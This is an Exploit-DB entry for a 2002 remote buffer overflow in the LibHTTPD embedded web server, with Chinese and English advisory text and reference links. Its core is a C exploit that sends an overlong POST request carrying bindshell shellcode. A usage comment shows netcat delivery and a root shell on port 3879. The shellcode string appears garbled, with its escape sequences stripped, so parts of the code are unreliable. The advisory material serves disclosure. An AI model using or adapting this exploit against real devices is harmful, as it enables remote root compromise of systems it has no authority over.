https://www.exploit-db.com/exploits/22016
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200212-204

LibHTTPD是一款用于嵌入设备的小型WEB服务程序。LibHTTPD对超长POST请求处理不正确，远程攻击者可以利用这个漏洞对LibHTTPD服务程序进行缓冲区溢出攻击，以WEB进程在系统上执行任意指令。检查libhttpd.a库中的’api.c’源代码，发现860行的httpdProcessRequest()函数对用户提交的输入缺少正确检查，提交超长POST请求可导致不经过充分边界检查而直接进行拷贝操作，发生缓冲区溢出，精心构建提交请求数据可能以WEB进程权限在系统上执行任意指令。

source: http://www.securityfocus.com/bid/6172/info

LibHTTPD is vulnerable to a buffer overflow condition. By passing a POST request of excessive length, it is possible to overrun a static buffer. This may result in sensitive locations in memory being overwritten by attacker-supplied values.

Successful exploitation of this vulnerability may allow an attacker to execute arbitrary code with super user privileges.

It should be noted that this vulnerability was reported in LibHTTPD v1.2. It is not yet known whether earlier versions are affected. 

/*
**
** Lib HTTPd Remote Buffer Overflow exploit
**                             by Xpl017Elz
** __
** Testing exploit:
**
** bash$ (./0x82-Remote.libhttpdxpl;cat)|nc libhttphost 80
**
** (Ctrl+c)
** punt!
** bash$ nc libhttphost 3879
** uname
** Linux
** id
** uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),
** 3(sys),4(adm),6(disk),10(wheel)
** exit
** bash$
**
** --
** exploit by "you dong-hun"(Xpl017Elz), <[email protected]>.
** My World: http://x82.i21c.net
**
*/

#include <stdio.h>
int main(/* args? */)
{
    int shadd2r;
    char b1ndsh[] = /* 129byte bindshellcode */
        "2113451322262f2113201311211313C211]370C211]364K211M374215M"
        "3643152001311211E364Cf211]354f307E35617'211M360215E354211E"
        "370306E37420211320215M364315200211320CC315200211320C315"
        "2002113031311262?211320315200211320A31520035330^211u"
        "b1300210F07211Ef26013211363215Mb215Uf315200350343377"
        "377377/bin/sh";
    //--- POST &shellcode ---//
    fprintf(stdout,"POST ");
    for(shadd2r=0;shadd2r<0x408;shadd2r+=4)
    {/* rEDhAT Default: 0x804e482,
        Debian Address? */
        fprintf(stdout,"20234404b");
    }
    fprintf(stdout,"rn");
    //--- NOP,shellcode ---//
    for(shadd2r=0;shadd2r<0x3e8;shadd2r++)
    {/* SSSSSSSS...SSSSSSSSS;;; */
        fprintf(stdout,"S");
    }
    fprintf(stdout,"%srnx0xrnx82rnl0lrn",b1ndsh);
}

来源:BID
名称:6172
链接:http://www.securityfocus.com/bid/6172
来源:BUGTRAQ
名称:20021124LibHTTPDVulnerabilityandfix
链接:http://archives.neohapsis.com/archives/bugtraq/2002-11/0305.html
来源:www.securiteam.com
链接:http://www.securiteam.com/unixfocus/6H00I2060I.html
来源:XF
名称:libhttpd-httpdprocessrequest-bo(10615)
链接:http://www.iss.net/security_center/static/10615.php
来源:BUGTRAQ
名称:20021113RemoteBufferOverflowvulnerabilityinLibHTTPd.
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=103720432411860&w;=2
来源：NSFOCUS
名称：3920
链接：http://www.nsfocus.net/vulndb/3920